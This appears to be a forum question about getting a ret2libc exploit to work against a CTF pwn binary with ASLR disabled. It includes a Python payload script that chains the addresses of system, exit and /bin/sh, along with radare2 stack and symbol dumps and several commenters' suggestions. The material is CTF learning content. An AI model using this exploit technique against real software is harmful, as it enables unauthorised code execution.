# exploiting a binary using ret2libc

Tags: radare2, exploit, buffer-overflow, stack, libc

I ran into this binary at a CTF :
https://github.com/auehc/AUCTF-2020/tree/master/Pwn/House%20of%20Madness

I first tried to exploit it and get a shell using ret2libc technique, however I didn't succeed.
I know it is not the intended way to solve the challenge, but after the CTF, I am now focusing
on achieving ret2libc on this binary. And I am now stuck and need help :)

The source is in `challenge.c`, and the compiled version is `challenge`.

ASLR is disabled for the challenge, and on my computer too :

```
$ > cat /proc/sys/kernel/randomize_va_space
0
```

It is possible to trigger a buffer overflow using this input :

```
"2\n4\n3\nStephen\n"
```

plus some padding.

I wrote an exploit to try to pop a shell (without success) :

```
#!/usr/bin/env python2

import struct

valid_input = "2\n4\n3\nStephen\n"
pad = "aaaaaaaa2Aa3Aa4Aa5Aa6Aa7aaaa"
binsh = struct.pack("I", 0xf7f4caaa)
system = struct.pack("I", 0xf7e0c9e0)
exit = struct.pack("<I", 0xf7dffa60)

exploit = valid_input \
        + pad \
        + system \
        + exit \
        + binsh
print exploit
```

Now, I will tell you why I don't understand why it's not working.

When i break on the `ret` in the function where I triggered the buffer overflow, the stack looks like this:

```
[0x56556684]> pxw 16 @esp
0xffffd23c  0xf7e0c9e0 0xf7dffa60 0xf7f4caaa 0xffffd200  ....`...........
```

so, you can see that first there is `0xf7e0c9e0`, then `0xf7dffa60`, then `0xf7f4caaa`.

`0xf7e0c9e0` is the address of system in the libc :

```
[0x56556684]> dmi libc system
257   0x0012a2c0 0xf7ef82c0 GLOBAL FUNC   102       svcerr_systemerr
658   0x0003e9e0 0xf7e0c9e0 GLOBAL FUNC   55        __libc_system
1525  0x0003e9e0 0xf7e0c9e0 WEAK   FUNC   55        system
```

`0xf7dffa60` is the address of exit, altough it shouldn't be needed, if I popped the shell.

`0xf7f4caaa` is the address of the string `/bin/sh\x00` in the libc :

```
[0x56556684]> px10@0xf7f4caaa
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xf7f4caaa  2f62 696e 2f73 6800 6578                 /bin/sh.ex
```

I am stuck there, and can't figure out what is happening.. If anyone can point me in the right direction, I would be very happy :)

Comment: Why do you need `exit` address if you're not using it? when the `ret` instruction is executed, the `system` address is been popped out of the stack and the next 4 bytes are considered as the first argument of the function which, in this case, is `exit` address. try replacing it with the `/bin/sh` address, it should work.

Comment: @stylo Actually, the next 4 bytes are for the _next_ return address after _system_, so `exit` will be called after `system`. What is happening when you try your payload?

Comment: Also see https://security.stackexchange.com/q/155844, could be your problem if addresses are correct.